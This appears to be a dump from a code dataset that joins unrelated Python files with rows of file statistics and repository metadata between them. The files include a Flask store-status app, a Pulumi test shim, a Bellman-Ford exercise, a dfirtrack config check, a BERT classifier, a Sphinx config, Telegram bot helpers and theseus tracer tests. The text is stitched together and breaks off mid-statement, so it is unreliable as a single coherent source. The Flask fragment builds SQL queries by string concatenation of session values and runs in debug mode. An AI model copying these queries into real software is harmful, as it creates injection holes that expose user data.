cursor.execute(get_query)
raw_phone = cursor.fetchall()
get_query = "SELECT freeFormAddress FROM all_stores WHERE id = '" + session['selected_id'] + "';"
cursor.execute(get_query)
raw_address = cursor.fetchall()
messages, colors, type_item = parseMessage(session['selected_store'], int(session.get('selected_item')), raw_rating, raw_date, raw_user)
managers = getManagerList(raw_manager)
basic_info = []
basic_info.append(getAddress(raw_address[0][0]))
basic_info.append(getPhone(raw_phone[0][0]))
#user_email = request.get_json()
cursor.close()
db.close()
if session.get('user') == '':
return render_template("status.html", managers = managers,type_query = session.get('selected_option'),signIn=0, store=session['selected_store'], form=status_form,
messages=messages,
len=len(messages), colors=colors, type_item=type_item, basic_info=basic_info,
selected_item=getItem(session.get('selected_item')))
else:
return render_template("status.html", managers = managers, type_query = session.get('selected_option'), signIn = 1, store=session['selected_store'], form=status_form, messages=messages,
len=len(messages), colors=colors, type_item=type_item, basic_info=basic_info, selected_item = getItem(session.get('selected_item')))
@app.route('/index', methods=['GET', 'POST'])
@app.route('/', methods=['GET', 'POST'])
def homepage():
session['stores'] = []
session['ids'] = []
session['addresses'] = []
session['has_enabled'] = 'disabled'
session['distance'] = 10000
form = optionForm()
if form.validate_on_submit():
if form.find_item.data:
session['selected_option'] = 'find'
return redirect('/location')
elif form.provide_status.data:
session['selected_option'] = 'status'
return redirect('/location')
return render_template("index.html", form = form)
if __name__ == '__main__':
app.run(use_reloader=True, debug=True)
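# Note: the queries in this file are assembled by string concatenation; a
# safer, equivalent sketch with pymysql-style placeholders would be:
# cursor.execute(
#     "SELECT rating FROM status_list WHERE item = %s AND id = %s;",
#     (session.get('selected_item'), session['selected_id']),
# )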
| 38.111979
| 374
| 0.610386
| 1,747
| 14,635
| 4.949056
| 0.135661
| 0.047421
| 0.035392
| 0.030534
| 0.418228
| 0.366875
| 0.337034
| 0.291349
| 0.262202
| 0.236641
| 0
| 0.00808
| 0.238879
| 14,635
| 383
| 375
| 38.211488
| 0.768112
| 0.050427
| 0
| 0.215094
| 0
| 0
| 0.189451
| 0.001726
| 0
| 0
| 0
| 0.002611
| 0
| 1
| 0.045283
| false
| 0.003774
| 0.037736
| 0
| 0.211321
| 0.015094
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
348c6299bee8c546cf7aa75e9c41522b146fab11
| 2,634
|
py
|
Python
|
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
pkg/codegen/internal/test/testdata/output-funcs/py_tests/pulumi_py_tests.py
|
sticha/pulumi
|
76ee1b8ccfee815eb315d9e0e0ddfaaf505c472b
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2016-2021, Pulumi Corporation.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# These are copied from pulumi-azure-native or hand-written to
# compensate for an incomplete codegen test setup; we could fix the
# test to code-gen this from schema.
from collections import namedtuple
import pulumi
@pulumi.output_type
class StorageAccountKeyResponse(dict):
"""
An access key for the storage account.
"""
def __init__(__self__, *,
creation_time: str,
key_name: str,
permissions: str,
value: str):
"""
An access key for the storage account.
:param str creation_time: Creation time of the key, in round trip date format.
:param str key_name: Name of the key.
:param str permissions: Permissions for the key -- read-only or full permissions.
:param str value: Base 64-encoded value of the key.
"""
pulumi.set(__self__, "creation_time", creation_time)
pulumi.set(__self__, "key_name", key_name)
pulumi.set(__self__, "permissions", permissions)
pulumi.set(__self__, "value", value)
@property
@pulumi.getter(name="creationTime")
def creation_time(self) -> str:
"""
Creation time of the key, in round trip date format.
"""
return pulumi.get(self, "creation_time")
@property
@pulumi.getter(name="keyName")
def key_name(self) -> str:
"""
Name of the key.
"""
return pulumi.get(self, "key_name")
@property
@pulumi.getter
def permissions(self) -> str:
"""
Permissions for the key -- read-only or full permissions.
"""
return pulumi.get(self, "permissions")
@property
@pulumi.getter
def value(self) -> str:
"""
Base 64-encoded value of the key.
"""
return pulumi.get(self, "value")
CodegenTest = namedtuple('CodegenTest', ['outputs'])
Outputs = namedtuple('Outputs', ['StorageAccountKeyResponse'])
outputs = Outputs(StorageAccountKeyResponse)
codegentest = CodegenTest(outputs)
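# Illustrative use of the namedtuple shim defined above:
# >>> codegentest.outputs.StorageAccountKeyResponse is StorageAccountKeyResponse
# True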
| 30.988235
| 89
| 0.65186
| 327
| 2,634
| 5.137615
| 0.376147
| 0.057143
| 0.028571
| 0.045238
| 0.197619
| 0.197619
| 0.197619
| 0.102381
| 0.102381
| 0.04881
| 0
| 0.00813
| 0.252847
| 2,634
| 84
| 90
| 31.357143
| 0.845528
| 0.461655
| 0
| 0.181818
| 0
| 0
| 0.115323
| 0.020161
| 0
| 0
| 0
| 0
| 0
| 1
| 0.151515
| false
| 0
| 0.060606
| 0
| 0.363636
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3490cf6f7075a2aef1693d69a9521b0b995d567b
| 604
|
py
|
Python
|
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | 1
|
2020-09-21T16:56:24.000Z
|
2020-09-21T16:56:24.000Z
|
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | null | null | null |
unidad2/pc2/e1.py
|
upc-projects/cc76
|
0f1663cc439889b0c7e924923639e7c2e032b9b6
|
[
"MIT"
] | null | null | null |
import math
def Bellman_ford(G):
n = len(G)
distance = [-math.inf]*n
parents = [None]* n
distance[0] = 0
for _ in range(n-1):
for u in range(n):
for v, w in G[u]:
if distance[v-1] < distance[u-1] + w:
distance[v-1] = distance[u-1] + w
parents[v-1] = u
return distance, parents
G = [[(2,0)],
[(0,20), (3,20)],
[(4,-60)],
[(5,-60)],
[]]
win = True
distance, _ = Bellman_ford(G)
for i in distance:
if i <= -100:
win=False
print("winnable" if win else "hopeless")
| 18.875
| 53
| 0.463576
| 89
| 604
| 3.101124
| 0.41573
| 0.021739
| 0.086957
| 0.130435
| 0.152174
| 0.152174
| 0.152174
| 0
| 0
| 0
| 0
| 0.065104
| 0.364238
| 604
| 31
| 54
| 19.483871
| 0.653646
| 0
| 0
| 0
| 0
| 0
| 0.02649
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.041667
| false
| 0
| 0.041667
| 0
| 0.125
| 0.041667
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
3491846c1c297a3eafd5e93b910d0c66155d9336
| 1,743
|
py
|
Python
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 1
|
2021-07-24T17:22:50.000Z
|
2021-07-24T17:22:50.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-28T03:40:31.000Z
|
2022-02-28T03:40:52.000Z
|
Incident-Response/Tools/dfirtrack/dfirtrack_main/exporter/markdown/markdown_check_data.py
|
sn0b4ll/Incident-Playbook
|
cf519f58fcd4255674662b3620ea97c1091c1efb
|
[
"MIT"
] | 2
|
2022-02-25T08:34:51.000Z
|
2022-03-16T17:29:44.000Z
|
from django.contrib import messages
from dfirtrack_config.models import SystemExporterMarkdownConfigModel
from dfirtrack_main.logger.default_logger import warning_logger
import os
def check_config(request):
""" check variables in config """
# get config model
model = SystemExporterMarkdownConfigModel.objects.get(system_exporter_markdown_config_name = 'SystemExporterMarkdownConfig')
# reset stop condition
stop_exporter_markdown = False
# check MARKDOWN_PATH for empty string
if not model.markdown_path:
messages.error(request, "`MARKDOWN_PATH` contains an emtpy string. Check config!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN variable MARKDOWN_PATH empty string")
stop_exporter_markdown = True
# check MARKDOWN_PATH for existence in file system (check only if it actually is a non-empty string)
if model.markdown_path:
if not os.path.isdir(model.markdown_path):
messages.error(request, "`MARKDOWN_PATH` does not exist in file system. Check config or filesystem!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN path MARKDOWN_PATH not existing")
stop_exporter_markdown = True
# check MARKDOWN_PATH for write permission (check only if it actually is a non-empty string)
if model.markdown_path:
if not os.access(model.markdown_path, os.W_OK):
messages.error(request, "`MARKDOWN_PATH` is not writeable. Check config or filesystem!")
# call logger
warning_logger(str(request.user), " EXPORTER_MARKDOWN path MARKDOWN_PATH not writeable")
stop_exporter_markdown = True
return stop_exporter_markdown
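# Illustrative call site (hypothetical; a view would typically gate the export
# on the returned stop flag):
# if check_config(request):
#     return ...  # abort the markdown export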
| 44.692308
| 128
| 0.729776
| 217
| 1,743
| 5.677419
| 0.308756
| 0.155844
| 0.081169
| 0.048701
| 0.478084
| 0.45211
| 0.45211
| 0.45211
| 0.301136
| 0.258117
| 0
| 0
| 0.205967
| 1,743
| 38
| 129
| 45.868421
| 0.890173
| 0.188181
| 0
| 0.227273
| 0
| 0
| 0.266238
| 0.019986
| 0
| 0
| 0
| 0
| 0
| 1
| 0.045455
| false
| 0
| 0.181818
| 0
| 0.272727
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34940ee04b10ec17bfb59f0b5abe7be0ed5efa38
| 4,602
|
py
|
Python
|
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | null | null | null |
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | null | null | null |
models/bert_with_conversation_context.py
|
RobinRojowiec/intent-recognition-in-doctor-patient-interviews
|
b91c7a9f3ad70edd0f39b56e3219f48d1fcf2078
|
[
"Apache-2.0"
] | 1
|
2021-11-24T18:48:47.000Z
|
2021-11-24T18:48:47.000Z
|
import pickle
import torch
import torch.nn as nn
from torchtext.data import Field
from common.paths import ROOT_RELATIVE_DIR, MODEL_PATH
from models.bert_layer import BERTLayer
from probability.tables import TransitionTable
from utility.model_parameter import Configuration, ModelParameter
class BERTWithConversationContext(nn.Module):
def __init__(self, config: Configuration, class_count=100,
hidden_dim=100,
class_field=None, device=torch.device('cpu')):
"""
Simple embedding using position and previous class
:param config: model configuration (provides MAX_LENGTH and EMBEDDING_SIZE)
:param class_count: number of target classes
:param class_field: torchtext Field holding the class vocabulary
:param device: torch device to run on
"""
super(BERTWithConversationContext, self).__init__()
# set parameters
self.hidden_dim = hidden_dim
self.class_field: Field = class_field
self.class_count = class_count
self.max_length = config.get_int(ModelParameter.MAX_LENGTH)
self.embedding_size = config.get_int(ModelParameter.EMBEDDING_SIZE)
self.device = device
# configure history components
self.with_position_embedding = False
self.with_class_embedding = True
self.with_utterance_classifier = False
self.with_transition_probs = False
# create and initialize layers
# learns embedding vector for class labels
self.class_embedding = nn.Embedding(self.class_count, self.embedding_size)
# learns class label for positions
self.position_embedding = nn.Embedding(100, self.embedding_size)
# load probability table and neural_bert_models
with open(ROOT_RELATIVE_DIR + MODEL_PATH + "transition_table.pckl", "rb") as file_prt:
transition_table: TransitionTable = pickle.load(file_prt)
transition_table.lambda_value = 1
transition_table.class_field = class_field
fixed_embedding = transition_table.create_probability_matrix(device=self.device)
self.transition_embedding = nn.Embedding(self.class_count, self.class_count)
self.transition_embedding.weight.data.copy_(fixed_embedding)
self.transition_embedding.weight.requires_grad = False
# embed previous sample
self.utterance_classifier = BERTLayer(device=self.device)
# output layer
self.dropout = nn.Dropout(p=0.5)
self.linear_input_size = self.get_embeddings_length() + self.get_additional_length() + self.utterance_classifier.get_output_length()
self.linear_layer = nn.Linear(self.linear_input_size, class_count)
self.softmax = nn.Softmax(dim=0)
def get_embeddings_length(self):
multiplier = 0
if self.with_position_embedding:
multiplier += 1
if self.with_class_embedding:
multiplier += 1
return self.embedding_size * multiplier
def get_additional_length(self):
add_length = 0
if self.with_utterance_classifier:
add_length += self.utterance_classifier.get_output_length()
if self.with_transition_probs:
add_length += self.class_count
return add_length
def forward(self, sample, previous_classes, positions, previous_sample, *args, **kwargs):
representations = []
# embed sample
sample_embed = self.utterance_classifier(sample)
representations.append(sample_embed)
# encode the previous utterance into a matrix
if self.with_utterance_classifier:
with torch.no_grad():
self.utterance_classifier.eval()
representations.append(self.utterance_classifier(previous_sample))
# learn vector representations for position and class
if self.with_class_embedding:
embed_previous_classes = self.class_embedding(previous_classes)
representations.append(embed_previous_classes)
if self.with_position_embedding:
embed_position = self.position_embedding(positions)
representations.append(embed_position)
# append transition probabilities for the previous classes
if self.with_transition_probs:
representations.append(self.transition_embedding(previous_classes))
# concatenate all representations
concat_class_and_position = torch.cat(representations, 1)
concat_class_and_position = self.dropout(concat_class_and_position)
# linear transformation
output = self.linear_layer(concat_class_and_position)
# calculate probabilities
probs = self.softmax(output)
return output, probs
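# Hypothetical construction sketch (the names below are assumptions, not taken
# from this repository; note the constructor also expects transition_table.pckl
# under ROOT_RELATIVE_DIR + MODEL_PATH):
#     config = Configuration(...)  # must provide MAX_LENGTH / EMBEDDING_SIZE
#     model = BERTWithConversationContext(config, class_count=20,
#                                         class_field=class_field,
#                                         device=torch.device('cpu'))
#     logits, probs = model(sample, previous_classes, positions, previous_sample)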
| 38.672269
| 140
| 0.69535
| 517
| 4,602
| 5.909091
| 0.251451
| 0.031424
| 0.026187
| 0.028805
| 0.138134
| 0.053682
| 0.053682
| 0
| 0
| 0
| 0
| 0.005137
| 0.238592
| 4,602
| 118
| 141
| 39
| 0.866724
| 0.121469
| 0
| 0.136986
| 0
| 0
| 0.006531
| 0.005275
| 0
| 0
| 0
| 0
| 0
| 1
| 0.054795
| false
| 0
| 0.109589
| 0
| 0.219178
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
349ac7bf295420ef2ab524ccb2bae107924bef1f
| 9,274
|
py
|
Python
|
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | 5
|
2022-03-25T17:15:04.000Z
|
2022-03-28T23:24:26.000Z
|
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | null | null | null |
docs/conf.py
|
myii/saltenv
|
2309e6759504f5326a444270c8e8bb3edf14b760
|
[
"Apache-2.0"
] | 2
|
2022-03-26T06:33:30.000Z
|
2022-03-29T19:43:50.000Z
|
#
# Configuration file for the Sphinx documentation builder.
#
# This file does only contain a selection of the most common options. For a
# full list see the documentation:
# http://www.sphinx-doc.org/en/master/config
# -- Path setup --------------------------------------------------------------
# If extensions (or modules to document with autodoc) are in another directory,
# add these directories to sys.path here. If the directory is relative to the
# documentation root, use os.path.abspath to make it absolute, like shown here.
#
# import os
# import sys
# sys.path.insert(0, os.path.abspath('.'))
import datetime
from pathlib import Path
# -- Project information -----------------------------------------------------
this_year = datetime.datetime.today().year
if this_year == 2022:
copyright_year = 2022
else:
copyright_year = f"2022 - {this_year}"
project = "saltenv"
copyright = f"{copyright_year}, nicholasmhughes"
author = "nicholasmhughes"
# Strip version info from ../../saltenv/version.py
with open(Path(Path(__file__).parent.parent, "saltenv", "version.py")) as version_file:
content = version_file.readlines()
for file_line in content:
if "version =" in file_line:
version = file_line.split(" ")[2].replace('"', "")
break
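# The loop above assumes ../saltenv/version.py contains a line of the form
# (illustrative, not verified against the repository):
#     version = "1.0.0"
# so that split(" ")[2] picks out the quoted value and replace() strips the quotes.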
# Variables to pass into the docs from sitevars.rst for rst substitution
with open("sitevars.rst") as site_vars_file:
site_vars = site_vars_file.read().splitlines()
rst_prolog = """
{}
""".format(
"\n".join(site_vars[:])
)
# -- General configuration ---------------------------------------------------
# If your documentation needs a minimal Sphinx version, state it here.
#
needs_sphinx = "3.5.3"
# Add any Sphinx extension module names here, as strings. They can be
# extensions coming with Sphinx (named 'sphinx.ext.*') or your custom
# ones.
extensions = [
"sphinx_copybutton",
"sphinx.ext.autodoc",
"sphinx.ext.autosummary",
"sphinx.ext.napoleon",
"sphinx.ext.intersphinx",
"sphinx.ext.viewcode",
"sphinx.ext.todo",
"sphinx.ext.coverage",
# "sphinxcontrib.spelling",
]
# Render TODO directives, set to FALSE before publishing
# This is incredibly helpful, when set to True, to know what is yet to be
# completed in documentation.
todo_include_todos = True
# Add any paths that contain templates here, relative to this directory.
templates_path = ["_templates"]
# The suffix(es) of source filenames.
# You can specify multiple suffix as a list of string:
#
# source_suffix = ['.rst', '.md']
source_suffix = ".rst"
# The master toctree document.
master_doc = "index"
# List of patterns, relative to source directory, that match files and
# directories to ignore when looking for source files.
# This pattern also affects html_static_path and html_extra_path.
exclude_patterns = [
"_build",
"Thumbs.db",
".DS_Store",
".vscode",
".venv",
".git",
".gitlab-ci",
".gitignore",
"sitevars.rst",
]
autosummary_generate = True
# ----- Napoleon Config ------------------------------------------------------
# For using Google-style docstrings in Python code as a standard, which is
# highly recommended. This improves tooling by expecting a standard way of
# using docstrings in your project.
# https://www.sphinx-doc.org/en/master/usage/extensions/napoleon.html
napoleon_google_docstring = True
napoleon_numpy_docstring = False
napoleon_include_init_with_doc = True
napoleon_include_private_with_doc = False
napoleon_include_special_with_doc = True
napoleon_use_admonition_for_examples = False
napoleon_use_admonition_for_notes = False
napoleon_use_admonition_for_references = False
napoleon_use_ivar = False
napoleon_use_param = True
napoleon_use_rtype = True
# ----- Intersphinx Config ---------------------------------------------------
# This extension can generate automatic links to the documentation of objects
# in other projects, such as the official Python or POP docs.
# https://www.sphinx-doc.org/en/master/usage/extensions/intersphinx.html
intersphinx_mapping = {
"python": ("https://docs.python.org/3", None),
"pytest": ("https://pytest.readthedocs.io/en/stable", None),
"pop": ("https://pop.readthedocs.io/en/latest/", None),
}
# ----- Autodoc Config -------------------------------------------------------
# This extension can import the modules you are documenting, and pull in
# documentation from docstrings in a semi-automatic way. This is powerful!
# https://www.sphinx-doc.org/en/master/usage/extensions/autodoc.html
autodoc_default_options = {"member-order": "bysource"}
# ----- Autosummary Config ---------------------------------------------------
# This extension generates function/method/attribute summary lists, similar to
# those output e.g. by Epydoc and other API doc generation tools. This is
# especially useful when your docstrings are long and detailed, and putting
# each one of them on a separate page makes them easier to read.
# https://www.sphinx-doc.org/en/master/usage/extensions/autosummary.html
autosummary_generate = True
# -- Options for HTML output -------------------------------------------------
# The theme to use for HTML and HTML Help pages. See the documentation for
# a list of builtin themes.
#
html_theme = "furo"
html_title = f"{project} Documentation"
html_show_sourcelink = True # False on private repos; True on public repos
# Theme options are theme-specific and customize the look and feel of a theme
# further. For a list of options available for each theme, see the
# documentation.
#
# html_theme_options = {}
# Add any paths that contain custom static files (such as style sheets) here,
# relative to this directory. They are copied after the builtin static files,
# so a file named "default.css" will overwrite the builtin "default.css".
# html_static_path = ["_static"]
# The name of an image file (relative to this directory) to place at the top
# of the sidebar.
# For example, official Salt Project docs use images from the salt-branding-guide
# https://gitlab.com/saltstack/open/salt-branding-guide/
#
# Example for >=4.0.0 of Sphinx (support for favicon via URL)
# html_logo = "https://gitlab.com/saltstack/open/salt-branding-guide/-/raw/master/logos/SaltProject_altlogo_teal.png?inline=true"
# Example for <4.0.0 of Sphinx, if added into _static/img/ and html_static_path is valid
# html_logo = "_static/img/SaltProject_altlogo_teal.png"
# The name of an image file (within the static path) to use as favicon of the
# docs. This file should be a Windows icon file (.ico), 16x16 or 32x32
# pixels large. Favicons can be as large as 228x228; PNG
# format is supported as well, not just .ico.
# For example, official Salt Project docs use images from the salt-branding-guide
# https://gitlab.com/saltstack/open/salt-branding-guide/
#
# Example for >=4.0.0 of Sphinx (support for favicon via URL)
# html_favicon = "https://gitlab.com/saltstack/open/salt-branding-guide/-/raw/master/logos/SaltProject_Logomark_teal.png?inline=true"
# Example for <4.0.0 of Sphinx, if added into _static/img/ and html_static_path is valid
# html_favicon = "_static/img/SaltProject_Logomark_teal.png"
# Custom sidebar templates, must be a dictionary that maps document names
# to template names.
#
# The default sidebars (for documents that don't match any pattern) are
# defined by theme itself. Builtin themes are using these templates by
# default: ``['localtoc.html', 'relations.html', 'sourcelink.html',
# 'searchbox.html']``.
#
# html_sidebars = {}
# -- Options for HTMLHelp output ---------------------------------------------
# Output file base name for HTML help builder.
htmlhelp_basename = "saltenvdoc"
# -- Options for LaTeX output ------------------------------------------------
latex_elements = {
# The paper size ('letterpaper' or 'a4paper').
#
# 'papersize': 'letterpaper',
# The font size ('10pt', '11pt' or '12pt').
#
# 'pointsize': '10pt',
# Additional stuff for the LaTeX preamble.
#
# 'preamble': '',
# Latex figure (float) alignment
#
# 'figure_align': 'htbp',
}
# Grouping the document tree into LaTeX files. List of tuples
# (source start file, target name, title,
# author, documentclass [howto, manual, or own class]).
latex_documents = [
(
master_doc,
"saltenv.tex",
"saltenv Documentation",
"nicholasmhughes",
"manual",
),
]
# -- Options for manual page output ------------------------------------------
# One entry per manual page. List of tuples
# (source start file, name, description, authors, manual section).
man_pages = [
(
master_doc,
"saltenv",
"saltenv Documentation",
[author],
1,
)
]
# -- Options for Texinfo output ----------------------------------------------
# Grouping the document tree into Texinfo files. List of tuples
# (source start file, target name, title, author,
# dir menu entry, description, category)
texinfo_documents = [
(
master_doc,
"saltenv",
"saltenv Documentation",
author,
"saltenv",
"One line description of project.",
"Miscellaneous",
),
]
# -- Extension configuration -------------------------------------------------
| 34.996226
| 133
| 0.667026
| 1,194
| 9,274
| 5.083752
| 0.335846
| 0.011862
| 0.016804
| 0.012356
| 0.212191
| 0.177595
| 0.148929
| 0.148929
| 0.148929
| 0.120593
| 0
| 0.006962
| 0.163683
| 9,274
| 264
| 134
| 35.128788
| 0.775658
| 0.684494
| 0
| 0.126214
| 0
| 0
| 0.249911
| 0.015709
| 0
| 0
| 0
| 0.003788
| 0
| 1
| 0
| false
| 0
| 0.019417
| 0
| 0.019417
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
349b663f81956d7e9257fe5e42ee283abd8a9e68
| 2,094
|
py
|
Python
|
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | null | null | null |
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | null | null | null |
utils.py
|
momskidvaava/firefoxbot
|
1ed85e4f6594b144ceabdecb19e6e022180e639e
|
[
"MIT"
] | 1
|
2021-11-25T14:05:25.000Z
|
2021-11-25T14:05:25.000Z
|
import datetime
import typing
import localization
from configurator import Config
def get_restriction_time(string: str) -> typing.Optional[int]:
"""
Get user restriction time in seconds
:param string: string to check for multiplier. The last symbol should be one of:
"m" for minutes, "h" for hours and "d" for days
:return: number of seconds to restrict or None if error
"""
if len(string) < 2:
return None
letter = string[-1]
try:
number = int(string[:-1])
except (TypeError, ValueError):  # int() raises ValueError on a non-numeric prefix
return None
else:
if letter == "m":
return 60 * number
elif letter == "h":
return 3600 * number
elif letter == "d":
return 86400 * number
else:
return None
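# Illustrative calls (not part of the original module):
#     get_restriction_time("30m")  # -> 1800
#     get_restriction_time("2h")   # -> 7200
#     get_restriction_time("1d")   # -> 86400
#     get_restriction_time("5")    # -> None (no unit suffix)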
def get_report_comment(message_date: datetime.datetime, message_id: int, report_message: typing.Optional[str]) -> str:
"""
Generates a report message for admins
:param message_date: Datetime when reported message was sent
:param message_id: ID of that message
:param report_message: An optional note for admins so that they can understand what's wrong
:return: A report message for admins in report chat
"""
msg = localization.get_string("report_message").format(
date=message_date.strftime(localization.get_string("report_date_format")),
chat_id=get_url_chat_id(int(Config.GROUP_MAIN)),
msg_id=message_id)
if report_message:
msg += localization.get_string("report_note").format(note=report_message)
return msg
def get_url_chat_id(chat_id: int) -> int:
"""
Well, this value is a "magic number", so I have to explain it a bit.
I don't want to use a hardcoded chat username, so I just take the chat's ID (see Config.GROUP_MAIN above),
add the 1_000_000_000_000 compensator and take the absolute value. This way I can use https://t.me/c/{chat_id}/{msg_id} links,
which don't rely on chat username.
:param chat_id: chat_id to apply magic number to
:return: chat_id for t.me links
"""
return abs(chat_id+1_000_000_000_000)
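# Worked example (illustrative): for a supergroup id of -1_001_234_567_890,
# abs(-1_001_234_567_890 + 1_000_000_000_000) == 1_234_567_890, which is the
# numeric form that https://t.me/c/{chat_id}/{msg_id} links expect.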
| 33.238095
| 118
| 0.668577
| 308
| 2,094
| 4.405844
| 0.392857
| 0.039794
| 0.046426
| 0.05969
| 0.078113
| 0
| 0
| 0
| 0
| 0
| 0
| 0.017089
| 0.245463
| 2,094
| 62
| 119
| 33.774194
| 0.841772
| 0.430755
| 0
| 0.16129
| 0
| 0
| 0.041894
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.096774
| false
| 0
| 0.129032
| 0
| 0.483871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
1
| 0
|
34a1337c8f6d2a9a081a7f61b09a68afa8480561
| 7,374
|
py
|
Python
|
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | 1
|
2016-04-27T07:58:20.000Z
|
2016-04-27T07:58:20.000Z
|
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | null | null | null |
theseus/test/test_tracer.py
|
pexip/os-python-theseus
|
3093edd7bc4af5556bce42c8602685010c695183
|
[
"0BSD"
] | null | null | null |
from cStringIO import StringIO
import inspect
import textwrap
import pytest
from twisted.internet import defer, task
from theseus._tracer import Function, Tracer
class FakeCode(object):
def __init__(self, filename='', name='', flags=0):
self.co_filename = filename
self.co_name = name
self.co_flags = flags
class FakeFrame(object):
def __init__(self, code=FakeCode(), back=None, globals={}, locals={}):
self.f_code = code
self.f_back = back
self.f_globals = globals
self.f_locals = locals
class FakeFunction(object):
def __init__(self, code=FakeCode()):
self.func_code = code
def test_function_of_frame():
"""
Function.of_frame examines a frame's code for its filename and code name.
"""
frame = FakeFrame(FakeCode('spam', 'eggs'))
assert Function.of_frame(frame) == ('spam', 'eggs')
def test_do_not_trace_non_deferred_returns():
"""
If a function returns a non-Deferred value, nothing happens. More
specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(FakeFrame(), 'return', None)
assert not t._function_data
def test_do_not_trace_generators():
"""
If a generator function returns a Deferred, nothing happens. More
specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(
FakeFrame(FakeCode(flags=inspect.CO_GENERATOR)),
'return', defer.Deferred())
assert not t._function_data
def test_do_not_trace_defer_module():
"""
If a function in twisted.internet.defer returns a Deferred, nothing
happens. More specifically, no function trace information is stored.
"""
t = Tracer()
t._trace(
FakeFrame(globals={'__name__': 'twisted.internet.defer'}),
'return', defer.Deferred())
assert not t._function_data
_frame_spam = FakeFrame(FakeCode('spam.py', 'spam'))
_frame_eggs = FakeFrame(FakeCode('eggs.py', 'eggs'), _frame_spam)
_frame_unwindGenerator = FakeFrame(
FakeCode('defer.py', 'unwindGenerator'),
